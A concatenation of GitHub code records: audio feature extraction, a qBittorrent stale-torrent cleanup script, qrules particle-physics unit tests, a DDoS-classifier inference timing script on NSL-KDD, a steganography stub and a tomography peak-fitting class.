d[i:i+ self.CFG['seg_length']], range(0,len(d), self.CFG['seg_length']) ))[:-1] # remove last segment\r\n bank = list()\r\n hann = np.hanning(self.CFG['seg_length'])\r\n\r\n for segment in audio:\r\n if (self.CFG['need_hann']):\r\n segment = np.multiply(segment,hann)\r\n melfb = librosa.feature.melspectrogram(y=segment, n_fft=self.CFG['n_fft'], win_length=self.CFG['win_length'], hop_length=self.CFG['hop_length'],n_mels=self.CFG['n_mels'])\r\n melfb = np.array(list(map(lambda ele: ele[:-2], melfb)))\r\n melfb = np.log10( 1 + melfb.flatten()) # remove first and last feature 21 .> 19\r\n # melfb = np.log10( 1 + melfb)\r\n bank.append(melfb)\r\n self.savenpy(path, bank)\r\n self.writelabel() ","repo_name":"jagabandhumishra/E2E_LD","sub_path":"compute_melspect.py","file_name":"compute_melspect.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19235801474","text":"#!/home/dulanic/python_scripts/qbt/venv/bin/python\nimport os\nfrom functions import ts, sizeof_fmt, qb\nfrom collections import Counter\nfrom urllib.parse import urlparse\n\ndef tracker_convert(tracker):\n a = trdict.get(tracker)\n return a\n\ndef reason_str(reason_num, age, ratio):\n reason_dict = {\n 1: f\"bad tracker\",\n 2: f\"seeding for {age} days\",\n 3: f\"seeding for {age} days and {ratio} ratio\",\n 4: f\"seeding ratio of {ratio}\"\n }\n\n b = reason_dict.get(reason_num)\n return b\n\nc = 1\n\ntrdict = {\n \"localhost.stackoverflow.tech\": \"IPT\",\n \"tracker.beyond-hd.me\": \"BHD\",\n \"ssl.empirehost.me\": \"IPT\",\n \"routing.bgp.technology\": \"IPT\",\n \"tracker.gazellegames.net\": \"GGN\",\n \"tracker.privatehd.to\": \"PHD\",\n \"tracker.tleechreload.org\": \"TL\",\n \"tracker.torrentleech.org\": \"TL\",\n \"speed.connecting.center\": \"SCD\",\n \"tracker.tv-vault.me\": \"TVV\", \n \"tracker.cinemaz.to\": \"CIN\",\n \"tracker.pixelhd.me\": \"PIX\",\n \"abtorrents.me\": \"ABM\",\n \"tt.jumbohostpro.eu\": \"PHD\",\n \"tracker.alpharatio.cc\": \"AR\",\n \"t.connecting.center\": \"PHD\"\n}\n\n# Trackers not to be excluded\ntr_exclude = [\n 'TVV',\n 'GGN',\n 'ABM'\n]\n\nfn = os.path.basename(__file__)\ntorrent_list = [] \ntorrent_list_to_check = [] \ndel_ct = 0 \ndel_size = 0 \ntorrent_list_file_size = 0 \ntorrent_list_ct = []\nhash_list_to_delete = [] \n\nfor t in qb.torrents_info():\n torrent_list_ct.append(tracker_convert(urlparse(t.tracker).hostname))\n for i in t.trackers:\n for u in str(i.tier):\n if u.isnumeric():\n r = qb.torrents_files(hash=t.hash)\n torrent = [t.hash,t.size,t.name,tracker_convert(urlparse(t.tracker).hostname),1,t.ratio,t.category,t.num_seeds,t.seeding_time/86400]\n torrent_list.append(torrent) if torrent not in torrent_list else torrent_list\n torrent_list_file_size += t.size\n torrent_list_to_check.append(torrent) if (i.msg in ('unregistered torrent','Torrent is not found or it is awaiting moderation','002: Invalid InfoHash, Torrent not found','Unregistered torrent') or 'Season pack uploaded' in i.msg) and torrent not in torrent_list_to_check else torrent_list_to_check \n torrent = [t.hash,t.size,t.name,tracker_convert(urlparse(t.tracker).hostname),3,t.ratio,t.category,t.num_seeds,t.seeding_time/86400]\n #if torrent[3] == None:\n # print(torrent)\n if (t.ratio > 2 and t.category == 'archive' and t.seeding_time > (60*60*24*30)):\n torrent_list_to_check.append(torrent) if torrent not in torrent_list_to_check else torrent_list_to_check\n elif t.seeding_time > 7776000:\n torrent_list_to_check.append(torrent) if torrent not in torrent_list_to_check else torrent_list_to_check\n elif t.ratio > 10: # delete if > 2.0 and in archive or if 30+ days old \n torrent_list_to_check.append(torrent) if torrent not in torrent_list_to_check else torrent_list_to_check\n\ntrackct = Counter(torrent_list_ct) #count of items for each tracker \n\nfor rw in torrent_list_to_check:\n tracker, ratio, age, reason_num = rw[3], round(rw[5],2), round(rw[8]), rw[4]\n if (tracker not in tr_exclude and trackct[rw[3]] > 2) or reason_num == 1:\n del_reason = reason_str(reason_num, age, ratio) \n if reason_num == 1 or reason_num in [2,3,4]:\n print(f'{ts()} - {fn} - {rw[2]} has been deleted due to {del_reason}')\n del_ct += 1\n del_size += rw[1]\n hash_list_to_delete.append(rw[0])\n\nif len(hash_list_to_delete) > 0:\n qb.torrents_delete(torrent_hashes=hash_list_to_delete,delete_files=True)\n\nprint(f'{ts()} - {fn} - Scanned a total of {len(torrent_list)} files totalling {sizeof_fmt(torrent_list_file_size)}')\n\nif len(torrent_list_to_check) > 0: \n print(f'{ts()} - {fn} - Deleted a total of {del_ct} file(s) with a total size of {sizeof_fmt(del_size)}')\nelse:\n print(f'{ts()} - {fn} - No stale files found to be deleted')\n","repo_name":"Dulanic/python_scripts","sub_path":"qbt/qbt.py","file_name":"qbt.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11867366923","text":"import sys\nfrom copy import deepcopy\nfrom typing import Dict, List, Tuple\n\nimport attrs\nimport pytest\n\nfrom qrules import InteractionType, ProblemSet, StateTransitionManager\nfrom qrules.combinatorics import (\n ParticleWithSpin,\n _create_edge_id_particle_mapping,\n match_external_edges,\n perform_external_edge_identical_particle_combinatorics,\n)\nfrom qrules.particle import Particle\nfrom qrules.quantum_numbers import (\n EdgeQuantumNumbers,\n InteractionProperties,\n NodeQuantumNumbers,\n)\nfrom qrules.system_control import (\n create_edge_properties,\n filter_graphs,\n remove_duplicate_solutions,\n require_interaction_property,\n)\nfrom qrules.topology import Edge, MutableTransition, Topology\n\nif sys.version_info < (3, 8):\n from importlib_metadata import version\nelse:\n from importlib.metadata import version\n\n\n@pytest.mark.parametrize(\n (\n \"initial_state\",\n \"final_state\",\n \"final_state_groupings\",\n \"result_graph_count\",\n ),\n [\n (\n [(\"Y(4260)\", [-1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[[\"D0\", \"pi0\"], [\"D~0\", \"pi0\"]]],\n 1,\n ),\n (\n [(\"Y(4260)\", [-1, 1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[[\"D0\", \"pi0\"], [\"D~0\", \"pi0\"]]],\n 2,\n ),\n (\n [(\"Y(4260)\", [1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [],\n 9,\n ),\n (\n [(\"Y(4260)\", [-1, 1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [],\n 18,\n ),\n (\n [(\"Y(4260)\", [1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[[\"D0\", \"pi0\"], [\"D~0\", \"pi0\"]], [\"D0\", \"pi0\"]],\n 3,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"pi0\"]],\n 4,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"gamma\"]],\n 4,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [],\n 8,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"pi-\"]],\n 0,\n ),\n ],\n)\ndef test_external_edge_initialization(\n particle_database,\n initial_state,\n final_state,\n final_state_groupings,\n result_graph_count,\n):\n stm = StateTransitionManager(\n initial_state,\n final_state,\n particle_database,\n formalism=\"helicity\",\n )\n\n stm.set_allowed_interaction_types([InteractionType.STRONG])\n for group in final_state_groupings:\n stm.add_final_state_grouping(group)\n\n problem_sets = stm.create_problem_sets()\n if problem_sets.values():\n assert len(next(iter(problem_sets.values()))) == result_graph_count\n\n\ndef get_pi0_width() -> float:\n if version(\"particle\") < \"0.16\":\n return 7.73e-09\n return 7.81e-09\n\n\ndef __get_d_pos() -> Tuple[float, float]:\n if version(\"particle\") < \"0.16\":\n return 1.86965, 6.33e-13\n if version(\"particle\") < \"0.21\":\n return 1.86966, 6.33e-13\n return 1.86966, 6.37e-13\n\n\ndef __get_f2_1270_pos() -> Tuple[float, float]:\n if version(\"particle\") < \"0.23\":\n return 1.2755, 0.18669999999999998\n return 1.2754, 0.1866\n\n\n@pytest.mark.parametrize(\n (\"particle_name\", \"spin_projection\", \"expected_properties\"),\n [\n (\n \"pi0\",\n 0,\n {\n EdgeQuantumNumbers.pid: 111,\n EdgeQuantumNumbers.mass: 0.1349768,\n EdgeQuantumNumbers.width: get_pi0_width(),\n EdgeQuantumNumbers.spin_magnitude: 0.0,\n EdgeQuantumNumbers.spin_projection: 0,\n EdgeQuantumNumbers.charge: 0,\n EdgeQuantumNumbers.isospin_magnitude: 1.0,\n EdgeQuantumNumbers.isospin_projection: 0.0,\n EdgeQuantumNumbers.strangeness: 0,\n EdgeQuantumNumbers.charmness: 0,\n EdgeQuantumNumbers.bottomness: 0,\n EdgeQuantumNumbers.topness: 0,\n EdgeQuantumNumbers.baryon_number: 0,\n EdgeQuantumNumbers.electron_lepton_number: 0,\n EdgeQuantumNumbers.muon_lepton_number: 0,\n EdgeQuantumNumbers.tau_lepton_number: 0,\n EdgeQuantumNumbers.parity: -1,\n EdgeQuantumNumbers.c_parity: 1,\n EdgeQuantumNumbers.g_parity: -1,\n },\n ),\n (\n \"D+\", # no g and c parity\n 0,\n {\n EdgeQuantumNumbers.pid: 411,\n EdgeQuantumNumbers.mass: __get_d_pos()[0],\n EdgeQuantumNumbers.width: __get_d_pos()[1],\n EdgeQuantumNumbers.spin_magnitude: 0.0,\n EdgeQuantumNumbers.spin_projection: 0,\n EdgeQuantumNumbers.charge: 1,\n EdgeQuantumNumbers.isospin_magnitude: 0.5,\n EdgeQuantumNumbers.isospin_projection: 0.5,\n EdgeQuantumNumbers.strangeness: 0,\n EdgeQuantumNumbers.charmness: 1,\n EdgeQuantumNumbers.bottomness: 0,\n EdgeQuantumNumbers.topness: 0,\n EdgeQuantumNumbers.baryon_number: 0,\n EdgeQuantumNumbers.electron_lepton_number: 0,\n EdgeQuantumNumbers.muon_lepton_number: 0,\n EdgeQuantumNumbers.tau_lepton_number: 0,\n EdgeQuantumNumbers.parity: -1,\n EdgeQuantumNumbers.c_parity: None,\n EdgeQuantumNumbers.g_parity: None,\n },\n ),\n (\n \"f(2)(1270)\", # spin projection 1\n 1.0,\n {\n EdgeQuantumNumbers.pid: 225,\n EdgeQuantumNumbers.mass: __get_f2_1270_pos()[0],\n EdgeQuantumNumbers.width: __get_f2_1270_pos()[1],\n EdgeQuantumNumbers.spin_magnitude: 2.0,\n EdgeQuantumNumbers.spin_projection: 1.0,\n EdgeQuantumNumbers.charge: 0,\n EdgeQuantumNumbers.isospin_magnitude: 0.0,\n EdgeQuantumNumbers.isospin_projection: 0.0,\n EdgeQuantumNumbers.strangeness: 0,\n EdgeQuantumNumbers.charmness: 0,\n EdgeQuantumNumbers.bottomness: 0,\n EdgeQuantumNumbers.topness: 0,\n EdgeQuantumNumbers.baryon_number: 0,\n EdgeQuantumNumbers.electron_lepton_number: 0,\n EdgeQuantumNumbers.muon_lepton_number: 0,\n EdgeQuantumNumbers.tau_lepton_number: 0,\n EdgeQuantumNumbers.parity: 1,\n EdgeQuantumNumbers.c_parity: 1,\n EdgeQuantumNumbers.g_parity: 1,\n },\n ),\n ],\n)\ndef test_create_edge_properties(\n particle_name,\n spin_projection,\n expected_properties,\n particle_database,\n skh_particle_version: str,\n):\n particle = particle_database[particle_name]\n assert create_edge_properties(particle, spin_projection) == expected_properties\n assert skh_particle_version is not None # dummy for skip tests\n\n\ndef make_ls_test_graph(angular_momentum_magnitude, coupled_spin_magnitude, particle):\n topology = Topology(\n nodes={0},\n edges={-1: Edge(None, 0)},\n )\n interactions = {\n 0: InteractionProperties(\n s_magnitude=coupled_spin_magnitude,\n l_magnitude=angular_momentum_magnitude,\n )\n }\n states: Dict[int, ParticleWithSpin] = {-1: (particle, 0)}\n return MutableTransition(topology, states, interactions) # type: ignore[arg-type,var-annotated]\n\n\ndef make_ls_test_graph_scrambled(\n angular_momentum_magnitude, coupled_spin_magnitude, particle\n):\n topology = Topology(\n nodes={0},\n edges={-1: Edge(None, 0)},\n )\n interactions = {\n 0: InteractionProperties(\n l_magnitude=angular_momentum_magnitude,\n s_magnitude=coupled_spin_magnitude,\n )\n }\n states: Dict[int, ParticleWithSpin] = {-1: (particle, 0)}\n return MutableTransition(topology, states, interactions) # type: ignore[arg-type,var-annotated]\n\n\nclass TestSolutionFilter:\n @pytest.mark.parametrize(\n (\"ls_pairs\", \"result\"),\n [\n ([(1, 0), (1, 1)], 2),\n ([(1, 0), (1, 0)], 1),\n ],\n )\n def test_remove_duplicates(self, ls_pairs, result, particle_database):\n pi0 = particle_database[\"pi0\"]\n graphs = []\n for ls_pair in ls_pairs:\n graphs.append(make_ls_test_graph(ls_pair[0], ls_pair[1], pi0))\n\n results = remove_duplicate_solutions(graphs)\n assert len(results) == result\n\n for ls_pair in ls_pairs:\n graphs.append(make_ls_test_graph_scrambled(ls_pair[0], ls_pair[1], pi0))\n results = remove_duplicate_solutions(graphs)\n assert len(results) == result\n\n @pytest.mark.parametrize(\n (\"input_values\", \"filter_parameters\", \"result\"),\n [\n (\n [(\"foo\", (1, 0)), (\"foo\", (1, 1))],\n (\n \"foo\",\n NodeQuantumNumbers.l_magnitude,\n [1],\n ),\n 2,\n ),\n (\n [(\"foo\", (1, 0)), (\"foo\", (2, 1))],\n (\n \"foo\",\n NodeQuantumNumbers.l_magnitude,\n [1],\n ),\n 1,\n ),\n (\n [(\"foo\", (1, 0)), (\"foo\", (1, 1))],\n (\n \"foo~\",\n NodeQuantumNumbers.l_magnitude,\n [1],\n ),\n 0,\n ),\n (\n [(\"foo\", (0, 0)), (\"foo\", (1, 1)), (\"foo\", (2, 1))],\n (\n \"foo\",\n NodeQuantumNumbers.l_magnitude,\n [1, 2],\n ),\n 2,\n ),\n (\n [(\"foo\", (1, 0)), (\"foo\", (1, 1))],\n (\n \"foo\",\n NodeQuantumNumbers.s_magnitude,\n [1],\n ),\n 1,\n ),\n ],\n )\n def test_filter_graphs_for_interaction_qns(\n self, input_values, filter_parameters, result, particle_database\n ):\n graphs = []\n pi0 = particle_database[\"pi0\"]\n\n for value in input_values:\n tempgraph = make_ls_test_graph(value[1][0], value[1][1], pi0)\n tempgraph = attrs.evolve(\n tempgraph,\n states={\n -1: (\n Particle(name=value[0], pid=0, mass=1.0, spin=1.0),\n 0.0,\n )\n },\n )\n graphs.append(tempgraph)\n\n my_filter = require_interaction_property(*filter_parameters)\n filtered_graphs = filter_graphs(graphs, [my_filter])\n assert len(filtered_graphs) == result\n\n\ndef _create_graph(\n problem_set: ProblemSet,\n) -> \"MutableTransition[ParticleWithSpin, InteractionProperties]\":\n return MutableTransition(\n topology=problem_set.topology,\n interactions=problem_set.initial_facts.interactions, # type: ignore[arg-type]\n states=problem_set.initial_facts.states, # type: ignore[arg-type]\n )\n\n\n@pytest.mark.parametrize(\n (\"initial_state\", \"final_state\"),\n [\n (\n [(\"Y(4260)\", [-1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n ),\n ],\n)\ndef test_edge_swap(particle_database, initial_state, final_state):\n stm = StateTransitionManager(\n initial_state,\n final_state,\n particle_database,\n formalism=\"helicity\",\n )\n stm.set_allowed_interaction_types([InteractionType.STRONG])\n\n problem_sets = stm.create_problem_sets()\n init_graphs: List[MutableTransition[ParticleWithSpin, InteractionProperties]] = []\n for _, problem_set_list in problem_sets.items():\n init_graphs.extend([_create_graph(x) for x in problem_set_list])\n\n for graph in init_graphs:\n ref_mapping = _create_edge_id_particle_mapping(\n graph, graph.topology.outgoing_edge_ids\n )\n edge_keys = list(ref_mapping.keys())\n edge1 = edge_keys[0]\n edge1_val = graph.topology.edges[edge1]\n edge1_props = deepcopy(graph.states[edge1])\n edge2 = edge_keys[1]\n edge2_val = graph.topology.edges[edge2]\n edge2_props = deepcopy(graph.states[edge2])\n graph.swap_edges(edge1, edge2)\n assert graph.topology.edges[edge1] == edge2_val\n assert graph.topology.edges[edge2] == edge1_val\n assert graph.states[edge1] == edge2_props\n assert graph.states[edge2] == edge1_props\n\n\n@pytest.mark.parametrize(\n (\"initial_state\", \"final_state\"),\n [\n (\n [(\"Y(4260)\", [-1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n ),\n ],\n)\ndef test_match_external_edges(particle_database, initial_state, final_state):\n stm = StateTransitionManager(\n initial_state,\n final_state,\n particle_database,\n formalism=\"helicity\",\n )\n\n stm.set_allowed_interaction_types([InteractionType.STRONG])\n\n problem_sets = stm.create_problem_sets()\n init_graphs: List[MutableTransition[ParticleWithSpin, InteractionProperties]] = []\n for _, problem_set_list in problem_sets.items():\n init_graphs.extend([_create_graph(x) for x in problem_set_list])\n\n match_external_edges(init_graphs)\n\n iter_graphs = iter(init_graphs)\n first_graph = next(iter_graphs)\n ref_mapping_fs = _create_edge_id_particle_mapping(\n first_graph, first_graph.topology.outgoing_edge_ids\n )\n ref_mapping_is = _create_edge_id_particle_mapping(\n first_graph, first_graph.topology.incoming_edge_ids\n )\n\n for graph in iter_graphs:\n assert ref_mapping_fs == _create_edge_id_particle_mapping(\n graph, first_graph.topology.outgoing_edge_ids\n )\n assert ref_mapping_is == _create_edge_id_particle_mapping(\n graph, first_graph.topology.incoming_edge_ids\n )\n\n\n@pytest.mark.parametrize(\n (\n \"initial_state\",\n \"final_state\",\n \"final_state_groupings\",\n \"result_graph_count\",\n ),\n [\n (\n [(\"Y(4260)\", [1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[[\"D0\", \"pi0\"], [\"D~0\", \"pi0\"]]],\n 2,\n ),\n (\n [(\"Y(4260)\", [1])],\n [(\"D0\", [0]), (\"D~0\", [0]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"D0\", \"pi0\"]],\n 6,\n ),\n (\n [(\"J/psi(1S)\", [1])],\n [(\"gamma\", [1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"pi0\"]],\n 1,\n ),\n (\n [(\"J/psi(1S)\", [-1, 1])],\n [(\"gamma\", [-1, 1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [],\n 12,\n ),\n (\n [(\"J/psi(1S)\", [1])],\n [(\"gamma\", [1]), (\"pi0\", [0]), (\"pi0\", [0])],\n [[\"pi0\", \"gamma\"]],\n 2,\n ),\n ],\n)\ndef test_external_edge_identical_particle_combinatorics(\n particle_database,\n initial_state,\n final_state,\n final_state_groupings,\n result_graph_count,\n):\n stm = StateTransitionManager(\n initial_state,\n final_state,\n particle_database,\n formalism=\"helicity\",\n )\n stm.set_allowed_interaction_types([InteractionType.STRONG])\n for group in final_state_groupings:\n stm.add_final_state_grouping(group)\n\n problem_sets = stm.create_problem_sets()\n\n init_graphs = []\n for _, problem_set_list in problem_sets.items():\n init_graphs.extend([_create_graph(x) for x in problem_set_list])\n\n match_external_edges(init_graphs)\n\n comb_graphs: List[MutableTransition[ParticleWithSpin, InteractionProperties]] = []\n for group in init_graphs:\n comb_graphs.extend(\n perform_external_edge_identical_particle_combinatorics(group)\n )\n assert len(comb_graphs) == result_graph_count\n\n ref_mapping_fs = _create_edge_id_particle_mapping(\n comb_graphs[0], comb_graphs[0].topology.outgoing_edge_ids\n )\n ref_mapping_is = _create_edge_id_particle_mapping(\n comb_graphs[0], comb_graphs[0].topology.incoming_edge_ids\n )\n\n for group in comb_graphs[1:]:\n assert ref_mapping_fs == _create_edge_id_particle_mapping(\n group, group.topology.outgoing_edge_ids\n )\n assert ref_mapping_is == _create_edge_id_particle_mapping(\n group, group.topology.incoming_edge_ids\n )\n","repo_name":"ComPWA/qrules","sub_path":"tests/unit/test_system_control.py","file_name":"test_system_control.py","file_ext":"py","file_size_in_byte":17141,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"35938576379","text":"import datetime\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.preprocessing import StandardScaler\nfrom tensorflow.keras.models import load_model\n\nfrom densenet.classifiers.one_d import DenseNet121\n\nfeature = [\"duration\", \"protocol_type\", \"service\", \"flag\", \"src_bytes\", \"dst_bytes\", \"land\", \"wrong_fragment\",\n \"urgent\",\n \"hot\",\n \"num_failed_logins\", \"logged_in\", \"num_compromised\", \"root_shell\", \"su_attempted\", \"num_root\",\n \"num_file_creations\", \"num_shells\",\n \"num_access_files\", \"num_outbound_cmds\", \"is_host_login\", \"is_guest_login\", \"count\", \"srv_count\",\n \"serror_rate\", \"srv_serror_rate\",\n \"rerror_rate\", \"srv_rerror_rate\", \"same_srv_rate\", \"diff_srv_rate\", \"srv_diff_host_rate\",\n \"dst_host_count\",\n \"dst_host_srv_count\",\n \"dst_host_same_srv_rate\", \"dst_host_diff_srv_rate\", \"dst_host_same_src_port_rate\",\n \"dst_host_srv_diff_host_rate\", \"dst_host_serror_rate\",\n \"dst_host_srv_serror_rate\", \"dst_host_rerror_rate\", \"dst_host_srv_rerror_rate\", \"label\", \"difficulty\"]\n\ntrain = \"./data/nsl-kdd/KDDTrain+.txt\"\ntrain_data = pd.read_csv(train, names=feature)\ntrain_data.drop([\"difficulty\"], axis=1, inplace=True)\n# print(train_data[\"label\"].value_counts())\n\ns = [\"normal\", \"back\", \"land\", \"neptune\", \"pod\", \"smurf\", \"teardrop\", \"mailbomb\", \"processtable\", \"udpstorm\",\n \"apache2\", \"worm\"]\ntrain_data = train_data.loc[train_data[\"label\"].isin(s)]\nprint(train_data[\"label\"].value_counts())\n\nmulti_data = train_data.copy()\nmulti_label = pd.DataFrame(multi_data.label)\n\nstd_scaler = StandardScaler()\n\n\ndef standardization(df, col):\n for i in col:\n arr = df[i]\n arr = np.array(arr)\n df[i] = std_scaler.fit_transform(arr.reshape(len(arr), 1))\n return df\n\n\nnumeric_col = multi_data.select_dtypes(include=\"number\").columns\ndata = standardization(multi_data, numeric_col)\n\nle2 = preprocessing.LabelEncoder()\nenc_label = multi_label.apply(le2.fit_transform)\nmulti_data[\"intrusion\"] = enc_label\n\nmulti_data.drop(labels=[\"label\"], axis=1, inplace=True)\nmulti_data = pd.get_dummies(multi_data, columns=[\"protocol_type\", \"service\", \"flag\"], prefix=\"\", prefix_sep=\"\")\ny_train_multi = multi_data[[\"intrusion\"]]\nX_train_multi = multi_data.drop(labels=[\"intrusion\"], axis=1)\nX_train_multi = np.expand_dims(X_train_multi, 2)\n\nX_train_multi = X_train_multi[:1, :, :]\n\nVGG = load_model(\"model/VGG.h5\")\n\n# warm up GPU\n_ = VGG.predict(X_train_multi)\n\ntotal = 0\nfor _ in range(10):\n a = datetime.datetime.now()\n _ = VGG.predict(X_train_multi)\n b = datetime.datetime.now()\n\n total += (b - a).microseconds / 1000\n\nprint(\"VGG inference time : \", total / 10, \"ms\")\n\nDenseNet = load_model(\"model/DenseNet.h5\", custom_objects={'DenseNet121': DenseNet121})\n_ = DenseNet.predict(X_train_multi)\n\ntotal = 0\nfor _ in range(10):\n a = datetime.datetime.now()\n _ = DenseNet.predict(X_train_multi)\n b = datetime.datetime.now()\n\n total += (b - a).microseconds / 1000\n\nprint(\"DenseNet inference time : \", total / 10, \"ms\")\n","repo_name":"cuongphamduc/DDoS-Classification","sub_path":"test_speed.py","file_name":"test_speed.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"75153564035","text":"# coding: utf8\n# chargement des fonctionalité d'image ainsi que de low et high\nfrom stegano import *\n\n# charge le fichier\nsize, image = image_load('message_x.png')\n\n# crée une nouvelle image de résultat\nresult = image_new(size)\n\n# ici votre code de decodage\n...\n\n# sauvegarde l'image\nimage_save(result, size, 'resultat.png')\n","repo_name":"guibou/teaching_iut2017_cg_intro","sub_path":"seance_4_Stegano/decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"33730901507","text":"import numpy as np\nimport mrcfile\nimport scipy.ndimage, scipy.signal\nfrom tomoxtal.utils import phases as phases_utils\nfrom tomoxtal.utils import visualize\n\n\nclass PeakFitter:\n\n def __init__(self, volume, coords, hkl, box_size):\n \"\"\"\n Initialize class.\n \n Parameters\n ----------\n volume : string\n path to real space crystal volume / tomogram in .mrc format\n coords : numpy.ndarray, shape (n_refls, 3), dtype int\n predicted or refined reflection coordinates\n hkl : numpy.ndarray, shape (n_refls, 3), dtype int\n Miller indices, ordered as coords\n box_size : int\n dimensions of box to extract\n \"\"\"\n self.ivols, self.pvols = self.extract_subvolumes(volume, coords, hkl, box_size)\n self.radii = self.subvol_radii(box_size)\n self.tightmask = np.ones((box_size,box_size,box_size)) \n \n def subvol_radii(self, box_size):\n \"\"\"\n Generate a cubic subvolume of length box_size whose values\n are the radii of each voxel, to be used during peak-fitting.\n\n Parameters\n ----------\n box_size : int\n length of cubic subvolume\n\n Returns\n -------\n radii : numpy.ndarray, shape (box_size, box_size, box_size)\n subvolume of each voxel's radius from center\n \"\"\"\n ls = np.linspace(-1, 1, box_size+1)\n ls = (ls[:-1] + ls[1:])/2\n radii = np.meshgrid(ls, ls, ls, indexing='ij')\n radii = np.sqrt(np.sum(np.square(radii), axis=0))\n return radii\n \n def generate_tightmask(self, tm_boxsize):\n \"\"\"\n Generate a tight mask centered in the subvolume, where the central region \n of dimensions given by tm_boxsize have a value of 1. An anisotropic tight\n mask is permitted given the anisotropy imposed by the missing wedge.\n\n Parameters\n ----------\n tm_boxsize : int or tuple of (int,int,int)\n dimensions of region to mask in pixels; if type int, then an isotropic\n subregion is masked\n\n Returns\n -------\n tightmask : numpy.ndarray, shape (N,N,N)\n mask of self.ivols shape, with a central subregion one-valued\n \"\"\"\n subvol_dims = np.array(self.radii.shape)\n center = np.array(0.5*subvol_dims).astype(int)\n\n if type(tm_boxsize) == int:\n tm_boxsize = (tm_boxsize,tm_boxsize,tm_boxsize)\n tm_boxsize = np.array(0.5*np.array(tm_boxsize)).astype(int)\n\n tightmask = np.zeros(subvol_dims)\n tightmask[center[0]-tm_boxsize[0]:center[0]+tm_boxsize[0]+1,\n center[1]-tm_boxsize[1]:center[1]+tm_boxsize[1]+1,\n center[2]-tm_boxsize[2]:center[2]+tm_boxsize[2]+1] = 1\n\n return tightmask\n \n def eliminate_phase_splitting(self, volume):\n \"\"\"\n Pre-process real space volume to prevent a circular discontinuity\n when taking the Fourier transform and thus phase splitting. This\n is accomlished by applying a window function and then shifting the\n center of the volume to the corner/origin of the Fourier transform.\n \n Parameters\n ----------\n volume : numpy.ndarray, shape (N,N,N)\n cubic volume of real space crystal\n \n Returns\n -------\n volume : numpy.ndarray, shape (N,N,N)\n volume after applying a window function and FFT-shift\n \"\"\"\n assert volume.shape[0] == volume.shape[1] == volume.shape[2]\n \n # apply a Tukey kernel so that borders fall to 0\n k = scipy.signal.tukey(volume.shape[0])\n k3d = k[:,np.newaxis,np.newaxis] * k[np.newaxis,:,np.newaxis] * k[np.newaxis,np.newaxis,:]\n volume *= k3d\n \n # shift center to origin of volume\n return np.fft.fftshift(volume)\n \n def extract_subvolumes(self, volume, coords, hkl, box_size):\n \"\"\"\n Extract intensity and phase subvolumes centered on the reflections.\n \n Parameters\n ----------\n volume : string\n path to real space crystal volume / tomogram in .mrc format\n coords : numpy.ndarray, shape (n_refls, 3), dtype int\n predicted or refined reflection coordinates\n hkl : numpy.ndarray, shape (n_refls, 3), dtype int\n Miller indices, ordered as coords\n box_size : int\n dimensions of box to extract\n\n Returns\n -------\n ivols : dictionary\n Miller index: subvolume array of intensities\n pvols : dictionary\n Miller index: subvolume array of phases in degrees\n \"\"\"\n \n hb = int(box_size/2)\n pvols, ivols = dict(), dict()\n \n # Fourier transform real space volume\n volume = mrcfile.open(volume).data.copy().astype(np.float32)\n volume = self.eliminate_phase_splitting(volume)\n ftI, ftp = phases_utils.ft_to_I_phase(phases_utils.compute_ft(volume), deg=True)\n \n # extract phase and intensity subvolumes around each predicted peak\n for i,miller in enumerate(hkl):\n c = coords[i]\n ivols[tuple(miller)] = ftI[c[0]-hb:c[0]+hb+1,c[1]-hb:c[1]+hb+1,c[2]-hb:c[2]+hb+1]\n pvols[tuple(miller)] = ftp[c[0]-hb:c[0]+hb+1,c[1]-hb:c[1]+hb+1,c[2]-hb:c[2]+hb+1]\n \n return ivols, pvols\n \n def fit_peak(self, ivol, pvol, isigma, psigma, weighted=True, tm_boxsize=None):\n \"\"\"\n Fit the peak in the intensity/phase subvolumes. First, high-intensity pixels \n are selected and the set of contiguous, selected pixels nearest the subvolume\n center is chosen. Then, pixels from this selection are discarded until their \n phase standard deviation is less than the psigma threhsold. \n\n Parameters\n ----------\n ivol : 